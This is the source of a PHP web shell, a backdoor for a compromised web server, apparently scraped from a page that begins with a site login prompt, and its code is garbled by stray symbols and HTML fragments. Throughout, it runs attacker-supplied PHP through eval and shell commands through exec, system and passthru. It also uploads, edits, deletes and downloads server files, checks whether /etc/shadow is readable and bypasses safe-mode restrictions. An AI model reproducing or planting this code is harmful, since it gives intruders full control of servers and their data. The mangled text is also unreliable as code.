'.$menu.'

Login below or click here to register

Email Address:
Password:
Reset Password      
';" style="margin-left:10px" >$
} $
$
function printFooter() { $
[ Writeable ]":"[ Not writable ]";" >
[ Writeable ]":"[ Not writable ]";" > $is_writable = is_writable($GLOBALS['cwd'])?"[ Writeable ]":"[ Not writable ]"; [ Writeable ]":"[ Not writable ]";" style="margin-left:10px" >$
?> $
$
" >
" > " style="margin-left:10px" >$ $ $ $ " style="border:none"> $ $ " > $
$
$this.f.value)
$'mkdir'
$this.f.value
$this.c.value) $
$
$
$
$
} $
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'] $
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'] $
function ex($in) { $
$out = ''; $
if(function_exists('exec')) { $
@exec($in $
$out = @join("n" $
}elseif(function_exists('passthru')) { $
ob_start(); $
@passthru($in); $
$out = ob_get_clean(); $
}elseif(function_exists('system')) { $
ob_start(); $
@system($in); $
$out = ob_get_clean(); $
}elseif(function_exists('shell_exec')) { $
$out = shell_exec($in); $
}elseif(is_resource($f = @popen($in $
$out = ""; $
while(!@feof($f)) $
$out .= fread($f $
pclose($f); $
} $
return $out; $
} $
function viewSize($s) { $
if($s >= 1073741824) $
return sprintf('%1.2f' $
elseif($s >= 1048576) $
return sprintf('%1.2f' $
elseif($s >= 1024) $
return sprintf('%1.2f' $
else $
return $s . ' B'; $
} $
$
function perms($p) { $
if (($p & 0xC000) == 0xC000)$i = 's'; $
elseif (($p & 0xA000) == 0xA000)$i = 'l'; $
elseif (($p & 0x8000) == 0x8000)$i = '-'; $
elseif (($p & 0x6000) == 0x6000)$i = 'b'; $
elseif (($p & 0x4000) == 0x4000)$i = 'd'; $
elseif (($p & 0x2000) == 0x2000)$i = 'c'; $
elseif (($p & 0x1000) == 0x1000)$i = 'p'; $
else $i = 'u'; $
$i .= (($p & 0x0100) ? 'r' : '-'); $
$i .= (($p & 0x0080) ? 'w' : '-'); $
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $
$i .= (($p & 0x0020) ? 'r' : '-'); $
$i .= (($p & 0x0010) ? 'w' : '-'); $
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $
$i .= (($p & 0x0004) ? 'r' : '-'); $
$i .= (($p & 0x0002) ? 'w' : '-'); $
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); $
return $i; $
} $
function viewPermsColor($f) { $
if (!@is_readable($f)) $
return ''.perms(@fileperms($f)).''; $
elseif (!@is_writable($f)) $
return ''.perms(@fileperms($f)).''; $
else $
return ''.perms(@fileperms($f)).''; $
} $
if(!function_exists("scandir")) { $
function scandir($dir) { $
$dh = opendir($dir); $
while (false !== ($filename = readdir($dh))) { $
$files[] = $filename; $
} $
return $files; $
} $
} $
function which($p) { $
$path = ex('which '.$p); $
if(!empty($path)) $
return $path; $
return false; $
} $
function actionSecInfo() { $
printHeader(); $
echo '

Server security information

'; $
function showSecParam($n $
$v = trim($v); $
if($v) { $
echo ''.$n.': '; $
if(strpos($v $
echo $v.'
';
$
else $
echo '
'.$v.'
';
$
} $
} $
$
showSecParam('Server software' $
showSecParam('Disabled PHP Functions' $
showSecParam('Open base dir' $
showSecParam('Safe mode exec dir' $
showSecParam('Safe mode include dir' $
showSecParam('cURL support' $
$temp=array(); $
if(function_exists('mysql_get_client_info')) $
$temp[] = "MySql (".mysql_get_client_info().")"; $
if(function_exists('mssql_connect')) $
$temp[] = "MSSQL"; $
if(function_exists('pg_connect')) $
$temp[] = "PostgreSQL"; $
if(function_exists('oci_connect')) $
$temp[] = "Oracle"; $
showSecParam('Supported databases' $'
echo '
';
$
$
if( $GLOBALS['os'] == 'nix' ) { $
[view]":'no');" style="border:none">
showSecParam('Readable /etc/passwd' $\"/etc/\"
[view]":'no');" style="border:none">
showSecParam('Readable /etc/shadow' $\"etc\"
showSecParam('OS version' $
showSecParam('Distr name' $
if(!$GLOBALS['safe_mode']) { $
echo '
';
$
$temp=array(); $
foreach ($userful as $item) $
if(which($item)){$temp[]=$item;} $
showSecParam('Userful' $'
$temp=array(); $
foreach ($danger as $item) $
if(which($item)){$temp[]=$item;} $
showSecParam('Danger' $'
$temp=array(); $
foreach ($downloaders as $item) $
if(which($item)){$temp[]=$item;} $
showSecParam('Downloaders' $'
echo '
';
$
showSecParam('Hosts' $
showSecParam('HDD space' $
showSecParam('Mount options' $
} $
} else { $
showSecParam('OS Version' $
showSecParam('Account Settings' $
showSecParam('User Accounts' $
} $
echo '
'; $
printFooter(); $
} $
$
function actionPhp() { $
if( isset($_POST['ajax']) ) { $
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; $
ob_start(); $
eval($_POST['p1']); $
$$temp
exit; $
} $
printHeader(); $
if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { $
echo '

PHP info

'; $
ob_start(); $
phpinfo(); $
$tmp = ob_get_clean(); $
$tmp = preg_replace('!body {.*}!msiU' $$tmp)
$tmp = preg_replace('!a:w+ {.*}!msiU' $$tmp)
$tmp = preg_replace('!h1!msiU' $$tmp)
echo $tmp; $
echo '

';
$
} $
if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; $
';" >
';" > echo ' send using AJAX
';
          
             
        
     
         
        ';"   style="margin-left:10px" >$ 
           
        
        
        
         
if(!empty($_POST['p1'])) { $
ob_start(); $
eval($_POST['p1']); $
echo htmlspecialchars(ob_get_clean()); $
} $
echo '
'; $
printFooter(); $
} $
$
function actionFilesMan() { $
printHeader(); $
echo '

File manager

'; $
if(isset($_POST['p1'])) { $
switch($_POST['p1']) { $
case 'uploadFile': $
if(!@move_uploaded_file($_FILES['f']['tmp_name'] $
echo "Can't upload file!"; $
break; $
break; $
case 'mkdir': $
if(!@mkdir($_POST['p2'])) $
echo "Can't create new dir"; $
break; $
case 'delete': $
function deleteDir($path) { $
$path = (substr($path $
$dh = opendir($path); $
while ( ($item = readdir($dh) ) !== false) { $
$item = $path.$item; $
if ( (basename($item) == "..") || (basename($item) == ".") ) $
continue; $
$type = filetype($item); $
if ($type == "dir") $
deleteDir($item); $
else $
@unlink($item); $
} $
closedir($dh); $
rmdir($path); $
} $
if(is_array(@$_POST['f'])) $
foreach($_POST['f'] as $f) { $
$f = urldecode($f); $
if(is_dir($f)) $
deleteDir($f); $
else $
@unlink($f); $
} $
break; $
case 'paste': $
if($_SESSION['act'] == 'copy') { $
function copy_paste($c $$d){
if(is_dir($c.$s)){ $
mkdir($d.$s); $
$h = opendir($c.$s); $
while (($f = readdir($h)) !== false) $
if (($f != ".") and ($f != "..")) { $
copy_paste($c.$s.'/' $$d.$s.'/')
} $
} elseif(is_file($c.$s)) { $
@copy($c.$s $
} $
} $
foreach($_SESSION['f'] as $f) $
copy_paste($_SESSION['cwd'] $$GLOBALS['cwd'])
} elseif($_SESSION['act'] == 'move') { $
function move_paste($c $$d){
if(is_dir($c.$s)){ $
mkdir($d.$s); $
$h = opendir($c.$s); $
while (($f = readdir($h)) !== false) $
if (($f != ".") and ($f != "..")) { $
copy_paste($c.$s.'/' $$d.$s.'/')
} $
} elseif(is_file($c.$s)) { $
@copy($c.$s $
} $
} $
foreach($_SESSION['f'] as $f) $
@rename($_SESSION['cwd'].$f $
} $
unset($_SESSION['f']); $
break; $
default: $
if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { $
$_SESSION['act'] = @$_POST['p1']; $
$_SESSION['f'] = @$_POST['f']; $
foreach($_SESSION['f'] as $k => $f) $
$_SESSION['f'][$k] = urldecode($f); $
$_SESSION['cwd'] = @$_POST['c']; $
} $
break; $
} $
';" >
';" > echo ''; ';" style="margin-left:10px" >$
} $
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); $
if($dirContent === false) { echo 'Can't open this folder!'; return; } $
global $sort; $
$sort = array('name' $
if(!empty($_POST['p1'])) { $
if(preg_match('!s_([A-z]+)_(d{1})!' $$match))
$sort = array($match[1] $
} $
?> $
" >
$
$ " >
$
$
$
printFooter(); $
} $
$
function actionStringTools() { $
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} $
if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i $
if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i $
if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i $
$
if(isset($_POST['ajax'])) { $
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; $
ob_start(); $
if(function_exists($_POST['p1'])) $
echo $_POST['p1']($_POST['p2']); $
$$temp
exit; $
} $
printHeader(); $
echo '

String conversions

'; $
$stringTools = array( $
'Base64 encode' => 'base64_encode' $
'Base64 decode' => 'base64_decode' $
'Url encode' => 'urlencode' $
'Url decode' => 'urldecode' $
'Full urlencode' => 'full_urlencode' $
'md5 hash' => 'md5' $
'sha1 hash' => 'sha1' $
'crypt' => 'crypt' $
'CRC32' => 'crc32' $
'ASCII to HEX' => 'ascii2hex' $
'HEX to ASCII' => 'hex2ascii' $
'HEX to DEC' => 'hexdec' $
'HEX to BIN' => 'hex2bin' $
'DEC to HEX' => 'dechex' $
'DEC to BIN' => 'decbin' $
'BIN to HEX' => 'bin2hex' $
'BIN to DEC' => 'bindec' $
'String to lower case' => 'strtolower' $
'String to upper case' => 'strtoupper' $
'Htmlspecialchars' => 'htmlspecialchars' $
'String length' => 'strlen' $
); $
if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; $
foreach($stringTools as $k => $v) $
".$k."";" >
".$k."";" > echo ""; ".$k."";" style="margin-left:10px" >$
send using AJAX
";" > 
           
         
     
send using AJAX
";" >   echo "  send using AJAX
";
          
             
        
     
         
          send using AJAX
";"   style="margin-left:10px" >$ 
           
        
        
        
         
if(!empty($_POST['p1'])) { $
if(function_exists($_POST['p1'])) $
echo htmlspecialchars($_POST['p1']($_POST['p2'])); $
} $
";" >
";" > echo""; ";" style="margin-left:10px" >$
?> $

Search for hash:

$
" >
" >
" style="margin-left:10px" >$

" >

" >

" style="margin-left:10px" >$

" >

" >

" style="margin-left:10px" >$

" >

" >

" style="margin-left:10px" >$

" >

" >

" style="margin-left:10px" >$

" >

" >

" style="margin-left:10px" >$

" >

" >

" style="margin-left:10px" >$
$
$
$
printFooter(); $
} $
$
function actionFilesTools() { $
if( isset($_POST['p1']) ) $
$_POST['p1'] = urldecode($_POST['p1']); $
if(@$_POST['p2']=='download') { $
if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { $
ob_start("ob_gzhandler" $
header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); $
if (function_exists("mime_content_type")) { $
$type = @mime_content_type($_POST['p1']); $
header("Content-Type: ".$type); $
} $
$fp = @fopen($_POST['p1'] $
if($fp) { $
while(!@feof($fp)) $
echo @fread($fp $
fclose($fp); $
} $
} elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { $
$
} $
exit; $
} $
if( @$_POST['p2'] == 'mkfile' ) { $
if(!file_exists($_POST['p1'])) { $
$fp = @fopen($_POST['p1'] $
if($fp) { $
$_POST['p2'] = "edit"; $
fclose($fp); $
} $
} $
} $
printHeader(); $
echo '

File tools

'; $
if( !file_exists(@$_POST['p1']) ) { $
echo 'File not exists'; $
printFooter(); $
return; $
} $
$uid = @posix_getpwuid(@fileowner($_POST['p1'])); $
$gid = @posix_getgrgid(@fileowner($_POST['p1'])); $
echo 'Name: '.htmlspecialchars($_POST['p1']).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
$
echo 'Create time: '.date('Y-m-d H:i:s' $fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s'
if( empty($_POST['p2']) ) $
$_POST['p2'] = 'view'; $
if( is_file($_POST['p1']) ) $
else $
$m = array('Chmod' $'Touch')
foreach($m as $v) $
'.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';" style="border:none">
echo '$null
echo '

';
$
switch($_POST['p2']) { $
case 'view': $
echo '
';
          
             
        
     
         
        $ 
           
        
        
        
         
$fp = @fopen($_POST['p1'] $
if($fp) { $
while( !@feof($fp) ) $
echo htmlspecialchars(@fread($fp $
@fclose($fp); $
} $
echo ''; $
break; $
case 'highlight': $
if( is_readable($_POST['p1']) ) { $
';" >
';" > echo '
$code = highlight_file($_POST['p1'] $
} $
break; $
case 'chmod': $
if( !empty($_POST['p3']) ) { $
$perms = 0; $
for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $
$perms += (int)$_POST['p3'][$i]*pow(8 $
if(!@chmod($_POST['p1'] $
';" >
';" > echo 'Can't set permissions!
';
';" style="margin-left:10px" >$
else $
} $
break; $
case 'edit': $
if( !is_writable($_POST['p1'])) { $
echo 'File isn't writeable'; $
break; $
} $
if( !empty($_POST['p3']) ) { $
@file_put_contents($_POST['p1'] $
';" >
';" > echo 'Saved!
';
';" style="margin-left:10px" >$
} $
$fp = @fopen($_POST['p1'] $
if($fp) { $
while( !@feof($fp) ) $
echo htmlspecialchars(@fread($fp $
@fclose($fp); $
} $
>">';" >
>">';" > echo ''; >">';" style="margin-left:10px" >$
break; $
case 'hexdump': $
$c = @file_get_contents($_POST['p1']); $
$n = 0; $
$h = array('00000000
'
$'')
$len = strlen($c); $
for ($i=0; $i<$len; ++$i) { $
$h[1] .= sprintf('%02X' $
switch ( ord($c[$i]) ) { $
case 0: $h[2] .= ' '; break; $
case 9: $h[2] .= ' '; break; $
case 10: $h[2] .= ' '; break; $
case 13: $h[2] .= ' '; break; $
default: $h[2] .= $c[$i]; break; $
} $
$n++; $
if ($n == 32) { $
$n = 0; $
if ($i+1 < $len) {$h[0] .= sprintf('%08X' $
$h[1] .= '
';
$
$h[2] .= "n"; $
} $
} $
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';" >
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';" > echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';" style="margin-left:10px" >$
break; $
case 'rename': $
if( !empty($_POST['p3']) ) { $
if(!@rename($_POST['p1'] $
';" >
';" > echo 'Can't rename!
';
';" style="margin-left:10px" >$
else $
} $
break; $
case 'touch': $
if( !empty($_POST['p3']) ) { $
$time = strtotime($_POST['p3']); $
if($time) { $
if(@touch($_POST['p1'] $$time))
else { $
';" >
';" > echo 'Fail!'; ';" style="margin-left:10px" >$
} $
';" >
';" > } else echo 'Bad time format!'; ';" style="margin-left:10px" >$
} $
break; $
case 'mkfile': $
$
break; $
} $
echo '
'; $
printFooter(); $
} $
$
function actionSafeMode() { $
$temp=''; $
ob_start(); $
switch($_POST['p1']) { $
case 1: $
$temp=@tempnam($test $
if(@copy("compress.zlib://".$_POST['p2'] $
echo @file_get_contents($temp); $
unlink($temp); $
} else $
echo 'Sorry... Can't open file'; $
break; $
case 2: $
$files = glob($_POST['p2'].'*');